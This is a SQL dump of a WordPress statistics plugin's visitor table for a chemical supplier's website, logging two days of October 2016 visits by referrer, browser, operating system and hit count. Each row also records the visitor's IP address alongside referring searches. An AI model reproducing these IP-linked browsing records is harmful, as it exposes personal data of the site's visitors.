INSERT INTO `wp_statistics_visitor` VALUES (1062, '2016-10-06', 'https://www.miller-stephenson.com/chemicals/release-agents/semi-permanent-release-agents/', 'Safari', 'iPhone', '10.0', '', '70.209.130.205', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1063, '2016-10-06', 'https://www.google.com/', 'Safari', 'iPhone', '10.0', '', '107.77.75.49', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1064, '2016-10-06', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '10.0', '', '71.122.10.66', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1065, '2016-10-06', 'https://www.bing.com/', 'MSIE', 'Windows', '11.0', '', '128.170.224.13', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1066, '2016-10-06', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '140.252.33.47', '000', 13, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1067, '2016-10-06', 'https://www.google.com', 'Firefox', 'Windows', '33.0', '', '52.90.61.173', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1068, '2016-10-06', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.51.181', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1069, '2016-10-06', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.48.28', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1070, '2016-10-06', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '45.0', '', '209.152.44.201', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1071, '2016-10-06', 'https://www.bing.com/', 'MSIE', 'Windows', '11.0', '', '128.170.224.10', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1072, '2016-10-06', 'https://www.miller-stephenson.com/', 'Chrome', 'Windows', '39.0.2171.95', '', '23.250.70.50', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1073, '2016-10-06', 'https://search.yahoo.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '198.41.92.66', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1074, '2016-10-06', 'https://www.miller-stephenson.com/', 'Opera', 'Windows', '12.17', '', '23.250.70.50', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1075, '2016-10-06', 'https://search.aol.com/aol/search?s_it=webmail-searchbox&q=miller%20stephenson&s_qt=ac', 'MSIE', 'Windows', '11.0', '', '68.237.174.73', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1076, '2016-10-06', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '50.246.235.217', '000', 16, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1077, '2016-10-06', 'https://www.google.com/aclk?sa=L&ai=DChcSEwif76nWpcfPAhWSYH4KHVxLArYYABAA&ei=I9n2V4OALZSUjQPawYToDQ&sig=AOD64_0aT7RfJ5mSqSWOD7Ie6swHjohFsA&rct=j&q=&sqi=2&ved=0ahUKEwjDnabWpcfPAhUUSmMKHdogAd0Q0QwIGg&adurl=', 'MSIE', 'Windows', '11.0', '', '159.83.168.254', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1078, '2016-10-06', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '49.0.2623.112', '', '47.185.229.155', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1079, '2016-10-06', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '47.144.177.16', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1080, '2016-10-06', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '114.249.18.119', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1081, '2016-10-06', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '47.89.47.50', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1082, '2016-10-06', 'https://www.bing.com/search?q=epon+828&form=MSNH14&sc=8-4&sp=-1&qs=n&sk=', 'MSIE', 'Windows', '9.0', '', '204.79.180.24', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1083, '2016-10-06', 'https://www.miller-stephenson.com/product/epon-828/', 'MSIE', 'Windows', '9.0', '', '204.79.180.84', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1084, '2016-10-07', 'https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/', 'Chrome', 'Windows', '53.0.2785.143', '', '73.82.35.236', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1085, '2016-10-07', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '203.75.213.67', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1086, '2016-10-07', 'https://www.miller-stephenson.com', 'Opera', 'Windows', '12.14', '', '52.51.79.45', '000', 73, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1087, '2016-10-07', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=5&ved=0ahUKEwjLxZmRtMfPAhUJSiYKHUklDugQFgg1MAQ&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fepon-828%2F&usg=AFQjCNG-ULz5hPi_elA0tDheufF5SIOMyg', 'MSIE', 'Windows', '11.0', '', '151.207.250.51', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1088, '2016-10-07', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '151.207.250.51', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1089, '2016-10-07', 'https://www.miller-stephenson.com', 'Opera', 'Windows', '12.14', '', '52.50.119.48', '000', 44, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1090, '2016-10-07', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '180.191.134.23', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1091, '2016-10-07', 'https://search.yahoo.co.jp/search;_ylt=A2RhOBb36vZXWx0A2R.JBtF7?p=MS-122AD+%E8%A6%8F%E6%A0%BC&search.x=1&fr=top_ga1_sa&tid=top_ga1_sa&ei=UTF-8&aq=&oq=&afs=', 'MSIE', 'Windows', '11.0', '', '192.218.140.245', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1092, '2016-10-07', 'https://www.miller-stephenson.com/product/releasys-8800/', 'Safari', 'iPhone', '10.0', '', '24.193.212.151', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1093, '2016-10-07', 'https://www.miller-stephenson.com', 'Safari', 'iPad', '10.0', '', '68.52.64.65', '000', 38, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1094, '2016-10-07', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '123.125.67.228', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1095, '2016-10-07', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.56.32', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1096, '2016-10-07', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.57.38', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1097, '2016-10-07', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '10.0', '', '174.194.4.18', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1098, '2016-10-07', 'https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/tribosys/connector-lubricants/', 'AppleWebKit', 'Windows', '534', '', '65.55.210.40', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1099, '2016-10-07', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '139.162.228.24', '000', 39, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1100, '2016-10-07', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '108.244.96.215', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1101, '2016-10-07', 'https://www.google.co.kr/', 'Chrome', 'Windows', '53.0.2785.143', '', '115.139.243.158', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1102, '2016-10-07', 'https://www.google.co.jp/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0ahUKEwin_o-MvsfPAhVKKJQKHUV8DKsQFggjMAE&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fmiller%2Fpdf%2FHeloxy.pdf&usg=AFQjCNEqJwggoJGvKB1ZOMq8A9m4dLsWyw', 'MSIE', 'Windows', '11.0', '', '61.196.98.132', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1103, '2016-10-07', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.116', '', '108.54.144.214', '000', 13, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1104, '2016-10-07', 'https://www.google.ca/', 'Safari', 'Macintosh', '10.0', '', '66.131.30.147', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1105, '2016-10-07', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '41.0.2224.3', '', '195.22.127.195', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1106, '2016-10-07', 'https://mschem.com/robots.txt', 'Unknown', 'Unknown', 'Unknown', '', '54.210.195.119', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1107, '2016-10-07', 'https://www.miller-stephenson.com/miller/solvents_cleaners.html', 'Chrome', 'Windows', '53.0.2785.143', '', '108.248.84.190', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1108, '2016-10-07', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '27.38.35.214', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1109, '2016-10-07', 'https://www.google.com/', 'Safari', 'iPhone', '10.0', '', '67.230.243.25', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1110, '2016-10-07', 'https://www.google.com/', 'Chrome', 'Chrome OS', '53.0.2785.144', '', '173.30.253.199', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1111, '2016-10-07', 'https://www.bing.com/search?q=Vazo+67+&go=Search&qs=n&form=QBRE&pq=vazo+67+&sc=8-8&sp=-1&sk=&cvid=F9F7168AA8074926B23D0CFB13D6DED4', 'Safari', 'Macintosh', '8.0.4', '', '134.129.16.139', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1112, '2016-10-07', 'https://www.miller-stephenson.com', 'Safari', 'iPad', '10.0', '', '24.193.212.151', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1113, '2016-10-07', 'https://www.miller-stephenson.com', 'Chrome', 'Android', '53.0.2785.124', '', '166.170.15.84', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1114, '2016-10-07', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '127.0.0.1', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1115, '2016-10-07', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '1.5', '', '217.174.192.132', '000', 118, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1116, '2016-10-07', 'https://www.google.com.sg/', 'Chrome', 'Windows', '53.0.2785.143', '', '203.115.136.130', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1117, '2016-10-07', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '108.54.54.93', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1118, '2016-10-07', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '52.37.103.74', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1119, '2016-10-07', 'https://www.google.com/search?q=krytox&oq=krytox&gs_l=mobile-heirloom-serp.3..0l5.738.7054.0.7674.10.9.0.0.0.0.662.2856.0j2j3j2j1j1.9.0....0...1c.1.34.mobile-heirloom-serp..4.6.1448.bImvBTVXmXY', 'Firefox', 'Android', '49.0', '', '174.199.19.204', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1120, '2016-10-07', 'https://www.google.com', 'Firefox', 'Windows', '33.0', '', '54.158.115.217', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1121, '2016-10-07', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.57.11', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1122, '2016-10-07', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.57.72', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1123, '2016-10-07', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '15.0.1', '', '184.173.144.194', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1124, '2016-10-07', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '180.151.233.10', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1125, '2016-10-07', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '76.10.69.202', '000', 16, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1126, '2016-10-07', 'https://www.miller-stephenson.com', 'Chrome', 'Android', '53.0.2785.124', '', '174.199.19.204', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1127, '2016-10-07', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '128.157.160.13', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1128, '2016-10-07', 'https://speplasticsindustryresource.com/Listing/Index/Chemicals__Additives/Catalysts__Curing_Agents/3334/50', 'MSIE', 'Windows', '7.0', '', '109.177.20.165', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1129, '2016-10-07', 'android-app://com.google.android.googlequicksearchbox', 'Chrome', 'Android', '53.0.2785.124', '', '68.186.15.130', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1130, '2016-10-07', 'https://www.miller-stephenson.com', 'Safari', 'Macintosh', '10.0', '', '71.87.249.148', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1131, '2016-10-07', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.48.11', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1132, '2016-10-07', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.51.139', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1133, '2016-10-07', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '10.0', '', '108.183.28.192', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1134, '2016-10-07', 'https://www.miller-stephenson.com', 'AppleWebKit', 'Macintosh', '602.1.50', '', '117.81.192.87', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1135, '2016-10-07', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '36.0', '', '72.51.45.15', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1136, '2016-10-07', 'https://www.google.ca/', 'Safari', 'iPhone', '10.0', '', '99.231.209.118', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1137, '2016-10-07', 'https://www.google.com.tw/', 'Chrome', 'Macintosh', '53.0.2785.143', '', '61.216.56.151', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1138, '2016-10-07', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '128.227.104.32', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1139, '2016-10-07', 'https://www.miller-stephenson.com', 'Edge', 'Windows', '13.10586', '', '45.16.248.170', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1140, '2016-10-07', 'https://www.miller-stephenson.com', 'Java', 'Unknown', '1.6.0', '', '51.175.135.105', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1141, '2016-10-07', 'https://www.google.com/', 'Chrome', 'Macintosh', '53.0.2785.143', '', '184.99.156.94', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1142, '2016-10-07', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.55.38', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1143, '2016-10-07', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.55.137', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1144, '2016-10-07', 'https://www.miller-stephenson.com', 'Edge', 'Windows', '12.246', '', '131.253.38.67', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1145, '2016-10-07', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '174.53.8.201', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1146, '2016-10-07', 'https://meduza-consult.ru/', 'MSIE', 'Windows', '6.0', '', '46.211.197.35', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1147, '2016-10-07', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.56.73', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1148, '2016-10-07', 'https://www.google.com.tw/', 'Chrome', 'Macintosh', '51.0.2704.103', '', '61.216.166.153', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1149, '2016-10-07', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '41.0.2228.0', '', '195.154.233.180', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1150, '2016-10-07', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '90.203.102.176', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1151, '2016-10-07', 'https://www.timer4web.com/domain/miller-stephenson.com', 'MSIE', 'Unknown', '6.0', '', '148.251.190.210', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1152, '2016-10-07', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '6.0.2', '', '180.76.15.14', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1153, '2016-10-07', 'https://www.google.co.il/', 'Chrome', 'Windows', '53.0.2785.116', '', '193.106.206.10', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1154, '2016-10-07', 'https://www.google.co.kr/', 'Chrome', 'Windows', '53.0.2785.143', '', '59.13.76.57', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1155, '2016-10-07', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '108.238.247.98', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1156, '2016-10-07', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '46.0.2490.86', '', '203.217.255.128', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1157, '2016-10-07', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '49.0.2623.75', '', '2601:1c0:ca00:65e8:9ee:7a0:f582:35', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1158, '2016-10-07', 'https://www.miller-stephenson.com', 'VB', 'Unknown', 'Unknown', '', '115.119.113.194', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1159, '2016-10-07', 'https://www.google.com/', 'Chrome', 'Windows', '49.0.2623.112', '', '70.195.14.51', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1160, '2016-10-07', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '119.195.170.164', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1161, '2016-10-07', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '34.0.1847.137', '', '192.198.86.186', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1162, '2016-10-07', 'https://astana.xkaz.org/', 'Opera', 'Windows', '9.00', '', '178.137.167.230', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1163, '2016-10-07', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '27.0.1453.93', '', '209.128.119.38', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1164, '2016-10-07', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.52.155', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1165, '2016-10-07', 'https://www.google.com.tw/', 'Chrome', 'Windows', '53.0.2785.116', '', '10.91.5.112', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1166, '2016-10-07', 'https://translate.googleusercontent.com/translate_p?hl=vi&prev=search&sl=en&u=https://www.miller-stephenson.com/miller/pdf/Heloxy.pdf&depth=1&rurl=translate.google.com.vn&usg=ALkJrhgAAAAAV_dFlqOCQfwuU45XsK5UKIoNyYlY3WXT', 'Chrome', 'Windows', '53.0.2785.143', '', '203.205.27.81', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1167, '2016-10-07', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '60.185.141.127', '000', 30, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1168, '2016-10-07', 'https://www.miller-stephenson.com/product/157-fsl/', 'MSIE', 'Windows', '11.0', '', '130.234.108.12', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1169, '2016-10-07', 'https://www.google.com', 'Firefox', 'Windows', '28.0', '', '54.191.92.40', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1170, '2016-10-07', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '46.0.2490.86', '', '203.217.247.193', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1171, '2016-10-07', 'https://www.google.com/', 'Chrome', 'Windows', '52.0.2743.116', '', '68.69.251.160', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1172, '2016-10-07', 'https://www.google.it/', 'Chrome', 'Windows', '53.0.2785.143', '', '2.228.163.120', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1173, '2016-10-07', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '91.121.161.167', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1174, '2016-10-07', 'https://www.miller-stephenson.com/miller/pdf/MS-122AD.pdf', 'Safari', 'iPad', '600.1.4', '', '162.72.53.82', '000', 28, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1175, '2016-10-07', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '10.0', '', '173.174.109.97', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1176, '2016-10-07', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '46.0.2490.86', '', '203.217.243.11', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1177, '2016-10-07', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '60.50.251.147', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1178, '2016-10-07', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.101', '', '101.226.65.102', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1179, '2016-10-07', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '101.226.33.204', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1180, '2016-10-07', 'https://www.google.de/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwj0jbbQncjPAhWLuRQKHbDKCtwQFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.135258522,d.d24', 'MSIE', 'Windows', '11.0', '', '62.157.202.73', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1181, '2016-10-07', 'https://www.google.co.uk/', 'Chrome', 'Windows', '49.0.2623.112', '', '20.133.40.13', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1182, '2016-10-07', 'https://www.google.co.th/', 'Chrome', 'Windows', '53.0.2785.143', '', '118.175.223.116', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1183, '2016-10-07', 'https://www.miller-stephenson.com/ptfe-dry-film-lubricants/', 'MSIE', 'Windows', '9.0', '', '182.118.25.213', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1184, '2016-10-07', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '204.124.152.10', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1185, '2016-10-07', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.58.183', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1186, '2016-10-07', 'https://dengi-pod-zalog-nedvizhimosti.ru/', 'MSIE', 'Windows', '6.0', '', '178.137.84.86', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1187, '2016-10-07', 'https://www.google.de/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwiQ45mlpcjPAhVEJCYKHeQGDNkQFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fmiller%2Fpdf%2FMS-242N%2C%2520242N-AS.pdf&usg=AFQjCNGshRLTaPwPGah1Py7rWJa5tteBAQ&bvm=bv.134495766,d.eWE', 'MSIE', 'Windows', '11.0', '', '192.138.41.10', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1188, '2016-10-07', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.49.145', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1189, '2016-10-07', 'https://www.google.pt/url?url=https://www.miller-stephenson.com/miller/pdf/MS-122AD.pdf&rct=j&frm=1&q=&esrc=s&sa=U&ved=0ahUKEwj2yvKXpsjPAhVEExoKHUkCArAQFggfMAI&usg=AFQjCNH5ngjVceJi2U-_1T7un0Xp7rhq4Q', 'MSIE', 'Windows', '8.0', '', '93.108.226.66', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1190, '2016-10-07', 'https://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1202.ZVxRmy69Ja7U4CIEgdHF5QEWDDdKD4bu2jQr9_L95lcn3xBeoFKeD8ae9bkggIgz.f0f5cef1796fecdee49d3f48fda45e3d98030f59&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YD4hgzqAYr5iuWBiLZQy-rY&data=UlNrNmk5WktYejR0eWJFYk1LdmtxbWg4V3VrcVZRaW5qSEV5NjF2QkhsZDhTWUNDSHQwZzhUZEJ4Vl9jRFgtVFlWN0hoSDY5OGFsNXJfR0lrRDRoMjd2dU1hQzZHZ1AxLWY0OXdTRDRvNWh4bjJVR2diMWgyQQ&b64e=2&sign=f3ac2535c1ba906bcdbab3c3899ea5cf&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQYpgPUyh7uQlm_5-AUK-huZyjeOhQGVduusbAQORN1wrl-7fuEZm6EX45zg_IbrLIujlJ_pE0qbSdTN_pB3Stf5x7QTdNgSd8k4kaGHxW-hlkmJ6w1mAP4DO8OOD-v1p8qWAR13oZMJG&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCXdCnh-_wii4eDNMV2UdzThKF9pLUAAqvAqwXTBgXe6_7Qji90wKixdGfDq8AJCuV-n-2bZ7yZaFFNp9-mS5EfbDb0KsxoOfKM&l10n=ru&cts=1475830497448&mc=3.0034928234', 'Chrome', 'Windows', '28.0.1500.95', '', '188.32.55.21', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1191, '2016-10-07', 'https://www.google.co.th/', 'Chrome', 'Windows', '53.0.2785.143', '', '124.120.146.182', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1192, '2016-10-07', 'https://www.google.com', 'Firefox', 'Windows', '31.0', '', '52.39.44.237', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1193, '2016-10-07', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '113.108.189.62', '000', 14, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1194, '2016-10-07', 'https://www.miller-stephenson.com/products/detail.aspx?ItemId=41', 'MSIE', 'Windows', '9.0', '', '182.118.25.216', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1195, '2016-10-07', 'https://www.google.co.kr/', 'Safari', 'iPhone', '10.0', '', '223.39.191.144', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1196, '2016-10-07', 'https://www.miller-stephenson.com/', 'Safari', 'iPhone', '10.0', '', '223.39.191.146', '000', 1, 0); 
